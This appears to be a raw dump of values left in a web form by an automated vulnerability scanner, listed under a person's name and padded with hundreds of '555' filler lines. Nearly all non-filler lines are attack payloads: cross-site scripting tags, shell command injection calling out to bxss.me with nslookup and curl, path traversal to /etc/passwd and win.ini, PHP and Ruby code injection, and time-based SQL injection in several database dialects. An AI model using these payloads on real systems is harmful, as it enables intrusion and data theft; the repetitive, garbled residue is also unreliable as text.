Davi Lucas
555
555
555
555
555
555
555
555
xfs.bxss.me
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'"
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >i2pv(9986)</ScRiPt>
555
555
555
555
555
555
555
'"()&%<zzz><ScRiPt >i2pv(9309)</ScRiPt>
555
555
555
5559004895
555
555
555
555
555
555
555
555
555
response.write(9084670*9938610)
555
555
12345'"\'\");|]*�{ <�>?''????
'+response.write(9084670*9938610)+'
555
"+response.write(9084670*9938610)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
2swgo6k2
555
555
555
555
555
G8hAon6q: M6qpDYUP
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo ajdgym$()\ oobetv\nz^xyu||a #' &echo ajdgym$()\ oobetv\nz^xyu||a #|" &echo ajdgym$()\ oobetv\nz^xyu||a #
555
../../../../../../../../../../../../../../etc/passwd
&echo jkbqwq$()\ pvcmez\nz^xyu||a #' &echo jkbqwq$()\ pvcmez\nz^xyu||a #|" &echo jkbqwq$()\ pvcmez\nz^xyu||a #
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555&echo wovgqp$()\ rshjbl\nz^xyu||a #' &echo wovgqp$()\ rshjbl\nz^xyu||a #|" &echo wovgqp$()\ rshjbl\nz^xyu||a #
555
file:///etc/passwd
555
555
|echo tixver$()\ vziwwh\nz^xyu||a #' |echo tixver$()\ vziwwh\nz^xyu||a #|" |echo tixver$()\ vziwwh\nz^xyu||a #
555
555
555
555
555
555|echo qvxovl$()\ jhwicf\nz^xyu||a #' |echo qvxovl$()\ jhwicf\nz^xyu||a #|" |echo qvxovl$()\ jhwicf\nz^xyu||a #
555
../555
555
555
expr 9000118918 - 962359
555
555
555
555
555
555
555
(nslookup -q=cname hitlvhkqagrsh41d87.bxss.me||curl hitlvhkqagrsh41d87.bxss.me))
555
555
555
555
$(nslookup -q=cname hitpzofamgwrra850b.bxss.me||curl hitpzofamgwrra850b.bxss.me)
555
555
555
555
&nslookup -q=cname hitbectqynyec489af.bxss.me&'\"`0&nslookup -q=cname hitbectqynyec489af.bxss.me&`'
555
555
555
555
&(nslookup -q=cname hitmttdvqrfpq19e89.bxss.me||curl hitmttdvqrfpq19e89.bxss.me)&'\"`0&(nslookup -q=cname hitmttdvqrfpq19e89.bxss.me||curl hitmttdvqrfpq19e89.bxss.me)&`'
555
555
555
555
555
|(nslookup -q=cname hitfvvwixgrowfb053.bxss.me||curl hitfvvwixgrowfb053.bxss.me)
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
`(nslookup -q=cname hitwvdkbtoryr7b854.bxss.me||curl hitwvdkbtoryr7b854.bxss.me)`
555
555
555
555
555
555
555
${10000268+10000164}
555
555
;(nslookup -q=cname hitthblpkajlh1d583.bxss.me||curl hitthblpkajlh1d583.bxss.me)|(nslookup -q=cname hitthblpkajlh1d583.bxss.me||curl hitthblpkajlh1d583.bxss.me)&(nslookup -q=cname hitthblpkajlh1d583.bxss.me||curl hitthblpkajlh1d583.bxss.me)
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitspvmupyrll0795c.bxss.me||curl${IFS}hitspvmupyrll0795c.bxss.me)
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hityzsafiazstbb1c5.bxss.me||curl${IFS}hityzsafiazstbb1c5.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityzsafiazstbb1c5.bxss.me||curl${IFS}hityzsafiazstbb1c5.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitzc'.'bmceyxsmda585.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(89).chr(107).chr(77).'
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
".gethostbyname(lc("hitzj"."uvmnrerzf7a99.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(78).chr(117).chr(79)."
555
';print(md5(31337));$a='
555
555
555
gethostbyname(lc('hitjo'.'ffxttsfi104a6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(66).chr(116).chr(80)
555
555
";print(md5(31337));$a="
555
555
555
555
555
555
555
555
${@print(md5(31337))}
555
555
555
555
555
555
${@print(md5(31337))}\
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555
bxss.me/t/xss.html?%00
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
555
555
555
555
555
555
555
555
555
/etc/shells
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
555
c:/windows/win.ini
555
555
555
555
555
555
bxss.me
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
"+"A".concat(70-3).concat(22*4).concat(101).concat(77).concat(100).concat(81)+(require"socket" Socket.gethostbyname("hityb"+"eviqliyj3fcd7.bxss.me.")[3].to_s)+"
http://bxss.me/t/fit.txt?.jpg
555
'+'A'.concat(70-3).concat(22*4).concat(108).concat(87).concat(97).concat(71)+(require'socket' Socket.gethostbyname('hitqb'+'cockkbwd0b0d7.bxss.me.')[3].to_s)+'
555
555
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(105).concat(77).concat(103).concat(90)+(require'socket' Socket.gethostbyname('hitpl'+'ypentcym10f0c.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
depoimentos
555
555
555
555
555
555
555
depoimentos�
555
555
555
555
555
555
redirtest.acx
555
depoimentos/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n971032=v987520
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
!(()&&!|*|*|
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555'&&sleep(27*1000)*bvsgmz&&'
555
555
555
555
555"&&sleep(27*1000)*daqurq&&"
555
555
555
555
555
555
555'||sleep(27*1000)*dwwqaq||'
555
555
555
xfs.bxss.me
555"||sleep(27*1000)*mjmrwp||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >FN3L(9080)</ScRiPt>
555
555
555
555
555
555
555
'"()&%<zzz><ScRiPt >FN3L(9192)</ScRiPt>
555
555
555
555
555
5559514684
555
555
555
12345'"\'\");|]*�{ <�>?''????
555
response.write(9641522*9855446)
555
555
555
555
555
555
555
555
'+response.write(9641522*9855446)+'
555
555
555
555
555
555
555
555
555
555
"+response.write(9641522*9855446)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bLdCUrwr
555
555
555
555
555
555
555
555
555
555
9mWySkgm: 2eIpnoN1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
echo djgamk$()\ iwzrpk\nz^xyu||a #' &echo djgamk$()\ iwzrpk\nz^xyu||a #|" &echo djgamk$()\ iwzrpk\nz^xyu||a #
555
555
555
555
555
555
555
555
&echo pbfqdq$()\ nprvxw\nz^xyu||a #' &echo pbfqdq$()\ nprvxw\nz^xyu||a #|" &echo pbfqdq$()\ nprvxw\nz^xyu||a #
555
555
555
555
555
555&echo xkanhk$()\ hlapma\nz^xyu||a #' &echo xkanhk$()\ hlapma\nz^xyu||a #|" &echo xkanhk$()\ hlapma\nz^xyu||a #
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
|echo tcyxmz$()\ vwisde\nz^xyu||a #' |echo tcyxmz$()\ vwisde\nz^xyu||a #|" |echo tcyxmz$()\ vwisde\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
555
555|echo smokte$()\ kqagrf\nz^xyu||a #' |echo smokte$()\ kqagrf\nz^xyu||a #|" |echo smokte$()\ kqagrf\nz^xyu||a #
555
555
555
555
expr 9000478529 - 914661
555
555
555
file:///etc/passwd
555
555
555
555
555
(nslookup -q=cname hitqibsrsssav41cf9.bxss.me||curl hitqibsrsssav41cf9.bxss.me))
555
${10000498+9999991}
555
../555
$(nslookup -q=cname hitrjgsskoleg77b3a.bxss.me||curl hitrjgsskoleg77b3a.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
&nslookup -q=cname hituyptprxgmn60e1c.bxss.me&'\"`0&nslookup -q=cname hituyptprxgmn60e1c.bxss.me&`'
555
555
555
555
555
&(nslookup -q=cname hitgwbvrclbfeb4d04.bxss.me||curl hitgwbvrclbfeb4d04.bxss.me)&'\"`0&(nslookup -q=cname hitgwbvrclbfeb4d04.bxss.me||curl hitgwbvrclbfeb4d04.bxss.me)&`'
555
555
555
555
555
555
|(nslookup -q=cname hitjnkrkpliil19095.bxss.me||curl hitjnkrkpliil19095.bxss.me)
555
555
555
555
555
555
`(nslookup -q=cname hitcxjfkrjicw0afe7.bxss.me||curl hitcxjfkrjicw0afe7.bxss.me)`
555
555
555
555
555
555
555
;(nslookup -q=cname hitnvriwlbllff5669.bxss.me||curl hitnvriwlbllff5669.bxss.me)|(nslookup -q=cname hitnvriwlbllff5669.bxss.me||curl hitnvriwlbllff5669.bxss.me)&(nslookup -q=cname hitnvriwlbllff5669.bxss.me||curl hitnvriwlbllff5669.bxss.me)
555
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitxxlirtgytnb24eb.bxss.me||curl${IFS}hitxxlirtgytnb24eb.bxss.me)
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hititzozwljfm1ed00.bxss.me||curl${IFS}hititzozwljfm1ed00.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hititzozwljfm1ed00.bxss.me||curl${IFS}hititzozwljfm1ed00.bxss.me)&`'
555
';print(md5(31337));$a='
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
";print(md5(31337));$a="
555
'.gethostbyname(lc('hitrj'.'acqqjwtzed3da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(66).chr(110).chr(87).'
555
555
bxss.me/t/xss.html?%00
555
555
555
555
${@print(md5(31337))}
".gethostbyname(lc("hitao"."htdwxxja895c3.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(88).chr(105).chr(72)."
555
555
gethostbyname(lc('hitge'.'iebblhqhe7b59.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(70).chr(110).chr(68)
555
${@print(md5(31337))}\
555
555
555
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(88).concat(114).concat(76)+(require"socket" Socket.gethostbyname("hitne"+"oatdedvy202a9.bxss.me.")[3].to_s)+"
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(81).concat(121).concat(71)+(require'socket' Socket.gethostbyname('hitwd'+'njdatmbx684a5.bxss.me.')[3].to_s)+'
/etc/shells
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(105).concat(87).concat(97).concat(72)+(require'socket' Socket.gethostbyname('hitcn'+'baojfqyta7fcd.bxss.me.')[3].to_s)
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
555
555
c:/windows/win.ini
555
555
555
555
555
555
bxss.me
555
555
555
555
555
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
depoimentos
555
555
555
depoimentos�
555
555
555
555
555
depoimentos/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n913049=v906964
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
!(()&&!|*|*|
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
1Z8NYVY8M0
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555'&&sleep(27*1000)*vdqyoi&&'
555
555
555
555"&&sleep(27*1000)*fdapxn&&"
555
555
555
555
555
555'||sleep(27*1000)*yqenxy||'
555
555
555
555
555"||sleep(27*1000)*ieijvp||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555'"()&%<zzz><ScRiPt >fgNx(9093)</ScRiPt>
555
555
12345'"\'\");|]*�{ <�>?''????
555
'"()&%<zzz><ScRiPt >fgNx(9478)</ScRiPt>
555
555
555
555
555
555
5559215264
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9024357*9949121)
555
555
555
555
555
'+response.write(9024357*9949121)+'
555
"+response.write(9024357*9949121)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
n3GxfPzP
555
555
555
555
555
p0kUDKrS: H8HfZr4r
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555<esi:include src="http://bxss.me/rpb.png"/>
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
echo vxekxk$()\ yljttf\nz^xyu||a #' &echo vxekxk$()\ yljttf\nz^xyu||a #|" &echo vxekxk$()\ yljttf\nz^xyu||a #
555
555
../555
555
&echo zbiupv$()\ sjxqov\nz^xyu||a #' &echo zbiupv$()\ sjxqov\nz^xyu||a #|" &echo zbiupv$()\ sjxqov\nz^xyu||a #
555
555
555
555
555
555
555
555
555
555
555&echo fomazp$()\ piovtr\nz^xyu||a #' &echo fomazp$()\ piovtr\nz^xyu||a #|" &echo fomazp$()\ piovtr\nz^xyu||a #
555
555
555
555
|echo okedjf$()\ hefixp\nz^xyu||a #' |echo okedjf$()\ hefixp\nz^xyu||a #|" |echo okedjf$()\ hefixp\nz^xyu||a #
555
555
${10000015+9999969}
555
555
555|echo yccyed$()\ ynysdm\nz^xyu||a #' |echo yccyed$()\ ynysdm\nz^xyu||a #|" |echo yccyed$()\ ynysdm\nz^xyu||a #
555
555
555
555
555
555
expr 9000606008 - 910534
555
555
555
555
555
(nslookup -q=cname hitrxifhnjmno87362.bxss.me||curl hitrxifhnjmno87362.bxss.me))
555
555
555
555
555
$(nslookup -q=cname hitknmbrkhsmb9a581.bxss.me||curl hitknmbrkhsmb9a581.bxss.me)
555
555
555
555
555
555
555
&nslookup -q=cname hithoqmvghxff6c766.bxss.me&'\"`0&nslookup -q=cname hithoqmvghxff6c766.bxss.me&`'
555
555
'.gethostbyname(lc('hitbi'.'yegympsr9b16d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(79).chr(106).chr(89).'
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
&(nslookup -q=cname hitxfcanbgwkq63988.bxss.me||curl hitxfcanbgwkq63988.bxss.me)&'\"`0&(nslookup -q=cname hitxfcanbgwkq63988.bxss.me||curl hitxfcanbgwkq63988.bxss.me)&`'
555
555
".gethostbyname(lc("hitar"."qqiwsncd1d11d.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(87).chr(100).chr(81)."
';print(md5(31337));$a='
555
555
555
|(nslookup -q=cname hitikbzlttxwi99c69.bxss.me||curl hitikbzlttxwi99c69.bxss.me)
555
gethostbyname(lc('hitdu'.'vckzifzaed9d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(71).chr(112).chr(85)
555
`(nslookup -q=cname hitgjlhkggbup9b03d.bxss.me||curl hitgjlhkggbup9b03d.bxss.me)`
";print(md5(31337));$a="
555
555
555
${@print(md5(31337))}
555
555
;(nslookup -q=cname hitpdcwytydqq607ff.bxss.me||curl hitpdcwytydqq607ff.bxss.me)|(nslookup -q=cname hitpdcwytydqq607ff.bxss.me||curl hitpdcwytydqq607ff.bxss.me)&(nslookup -q=cname hitpdcwytydqq607ff.bxss.me||curl hitpdcwytydqq607ff.bxss.me)
${@print(md5(31337))}\
HttP://bxss.me/t/xss.html?%00
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hittagdaahzxz4e47a.bxss.me||curl${IFS}hittagdaahzxz4e47a.bxss.me)
555
bxss.me/t/xss.html?%00
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitpvgmewxrqh0c78c.bxss.me||curl${IFS}hitpvgmewxrqh0c78c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpvgmewxrqh0c78c.bxss.me||curl${IFS}hitpvgmewxrqh0c78c.bxss.me)&`'
'.print(md5(31337)).'
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
555
555
555
555
555
/etc/shells
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
c:/windows/win.ini
555
555
555
bxss.me
555
555
555
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(108).concat(80).concat(120).concat(79)+(require"socket" Socket.gethostbyname("hitxj"+"cszljgya881ae.bxss.me.")[3].to_s)+"
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(69).concat(118).concat(89)+(require'socket' Socket.gethostbyname('hitqv'+'tpkkcqrdc406d.bxss.me.')[3].to_s)+'
555
redirtest.acx
555
555
555
555
depoimentos
555
555
'A'.concat(70-3).concat(22*4).concat(98).concat(72).concat(116).concat(78)+(require'socket' Socket.gethostbyname('hitcd'+'ofaswmoa462a7.bxss.me.')[3].to_s)
555
depoimentos�
555
555
555
555
555
555
555
depoimentos/.
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n940977=v938892
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555'&&sleep(27*1000)*nckklo&&'
555
555
555
555"&&sleep(27*1000)*kueeej&&"
555qduHYdE2
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555Y0im4466
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
555
-1 OR 5*5=25
555
-1' OR 5*5=25 --
-1" OR 5*5=25 --
555
555
555
555
-1 OR 5*5=25 --
-1' OR 5*5=25 or 'bSLtzfeh'='
555
555
-1 OR 5*5=25
555
-1" OR 5*5=25 or "WBnwshx6"="
-1' OR 5*5=25 --
555
-1" OR 5*5=25 --
555
-1' OR 5*5=25 or 'MuuMEle5'='
-1" OR 5*5=25 or "t5n2n7bE"="
555
555
555
555
555
555
555'||sleep(27*1000)*xpiwoz||'
555*if(now()=sysdate(),sleep(15),0)
555
555"||sleep(27*1000)*eckfif||"
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555QyFbVaLn
555-1 waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'JxrYu5Ki'='
555k1yZ81IF'; waitfor delay '0:0:15' --
-1" OR 5*5=25 or "fsXIYbFQ"="
555HNsmkw9W'; waitfor delay '0:0:15' --
555-1 OR 18=(SELECT 18 FROM PG_SLEEP(15))--
555*if(now()=sysdate(),sleep(15),0)
555-1 OR 857=(SELECT 857 FROM PG_SLEEP(15))--
555-1) OR 461=(SELECT 461 FROM PG_SLEEP(15))--
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555-1) OR 133=(SELECT 133 FROM PG_SLEEP(15))--
555-1)) OR 479=(SELECT 479 FROM PG_SLEEP(15))--
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555-1)) OR 756=(SELECT 756 FROM PG_SLEEP(15))--
555aPxC2pTJ' OR 740=(SELECT 740 FROM PG_SLEEP(15))--
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555lahxmkmq' OR 737=(SELECT 737 FROM PG_SLEEP(15))--
555PsAoINKH') OR 144=(SELECT 144 FROM PG_SLEEP(15))--
555-1; waitfor delay '0:0:15' --
555L1p2QVQG') OR 153=(SELECT 153 FROM PG_SLEEP(15))--
555JyyhMWYr')) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
555-1); waitfor delay '0:0:15' --
555wR2ykoh5')) OR 495=(SELECT 495 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555-1 waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
55576QIsq4l'; waitfor delay '0:0:15' --
555'"
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555????%2527%2522\'\"
555
@@oChcV
555'"
555-1 OR 903=(SELECT 903 FROM PG_SLEEP(15))--
(select 198766*667891)
(select 198766*667891 from DUAL)
555????%2527%2522\'\"
@@00YNl
(select 198766*667891)
555-1) OR 242=(SELECT 242 FROM PG_SLEEP(15))--
(select 198766*667891 from DUAL)
555
555-1)) OR 836=(SELECT 836 FROM PG_SLEEP(15))--
555
555
555gjcyMyHe' OR 82=(SELECT 82 FROM PG_SLEEP(15))--
555
555
555y7bIYvyw') OR 685=(SELECT 685 FROM PG_SLEEP(15))--
555
555
555
555
555pAnfPxuW')) OR 492=(SELECT 492 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555'"
555
555????%2527%2522\'\"
@@hTgNr
555
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
<!--
555
555
555
555'"()&%<zzz><ScRiPt >FRX8(9368)</ScRiPt>
555
'"()&%<zzz><ScRiPt >FRX8(9303)</ScRiPt>
555
5559491837
555
555
555
555
555
555
555
12345'"\'\");|]*�{ <�>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9397153*9962423)
'+response.write(9397153*9962423)+'
555
555
"+response.write(9397153*9962423)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5tMuAua9
555
555
555
cSDXKuFl: 6s1wguyP
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
555
555
555
555
